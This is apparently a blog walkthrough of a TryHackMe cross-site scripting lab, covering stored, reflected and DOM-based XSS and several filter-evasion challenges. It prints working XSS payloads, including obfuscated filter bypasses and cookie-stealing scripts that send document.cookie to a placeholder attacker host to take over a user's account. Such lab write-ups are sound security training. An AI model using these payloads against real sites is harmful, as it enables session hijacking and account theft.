TryHackMe: Cross-site Scripting

ratiros01
6 min readJul 17, 2020

--

****Updated on 23/07/20 I can solve last task now thanks to Papadopejk****

****This room is broken on Task#8****

[Task 1] Introduction

[Task 2] Deploy your XSS Playground

[Task 3] Stored XSS

  1. The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.

2. Add a comment and see if you can insert some of your own HTML. Doing so will reveal the answer to this question.

I used payload from:

<img src=x onerror=alert('XSS');>

3. Create an alert popup box appear on the page with your document cookies.

<script>alert(document.cookie);</script>

4. Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.

Right click -> Inspect Element

Element id is “thm-title”.

I used this as a reference to edit string:

Let’s try it in browser’s console.

document.getElementById('thm-title').innerHTML="test";

It’s work.

Let’s inject the script

<script>document.getElementById('thm-title').innerHTML="I am a hacker";</script>

5. Stored XSS can be used to steal a victims cookie (data on a machine that authenticates a user to a webserver). This can be done by having a victims browser parse the following Javascript code:

<script>window.location=’http://attacker/cookie='+document.cookie</script>

This script navigates the users browser to a different URL, this new request will includes a victims cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.

Take over Jack’s account by stealing his cookie, what was his cookie value?

I always use Burp Suite’s sitemap to log site.

Access logs.

Maybe I can redirect Jack’s cookie here. Let’s click it.

There’s a log appeared.

Back to Stored XSS. Let’s put the script

<script>document.location='http://<ip>/log/'+document.cookie</script>

Back to /logs/ , refresh the page.

6. Post a comment as Jack.

Change the value to Jack’s and refresh. You will get the answer.

[Task 4] Reflected XSS

  1. Craft a reflected XSS payload that will cause a popup saying “Hello”
<script>alert("Hello")</script>

You can see that there’s a request.

2. Craft a reflected XSS payload that will cause a popup with your machines IP address.

<script>alert(window.location.hostname)</script>

[Task 5] DOM-Based XSS

  1. Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.

Let’s test it.

test" onmouseover="alert('Hover over the image and inspect the image element')"

Let’s “onmouseover” it. It’s work.

Let’s exploit it.

test" onmouseover="alert(document.cookie)"

2. Create an onhover event on an image tag, that change the background color of the website to red.

test" onhover="document.body.style.backgroundColor = 'red';

Nothing happened

Let’s try on mouse over.

test" onmouseover="document.body.style.backgroundColor = 'red';

[Task 6] Using XSS for IP and Port Scanning

[Task 7] XSS Keylogger

[Task 8] Filter Evasion

  1. Bypass the filter that removes any script tags.
<img src=x onerror=alert('Hello');>

2. The word alert is filtered, bypass it.

<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,72,101,108,108,111,39,41))";>

No flag. I think this room is broken.

****Update: I tried this payload.

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

3. The word hello is filtered, bypass it.

— Same script as #2.

****Update: I tried this payload.

<object onerror=alert('Hello')>

4. Filtered in challenge 4 is as follows:

  • word “Hello”
  • script
  • onerror
  • onsubmit
  • onload
  • onmouseover
  • onfocus
  • onmouseout
  • onkeypress
  • onchange

I used payload from portswigger:

Let’s test the payload first

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>

Let’s exploit

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="eval(String.fromCharCode(97,108,101,114,116,40,39,72,101,108,108,111,39,41))"></xss>

Success!!!

****Update: I tried this payload.

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>

--

--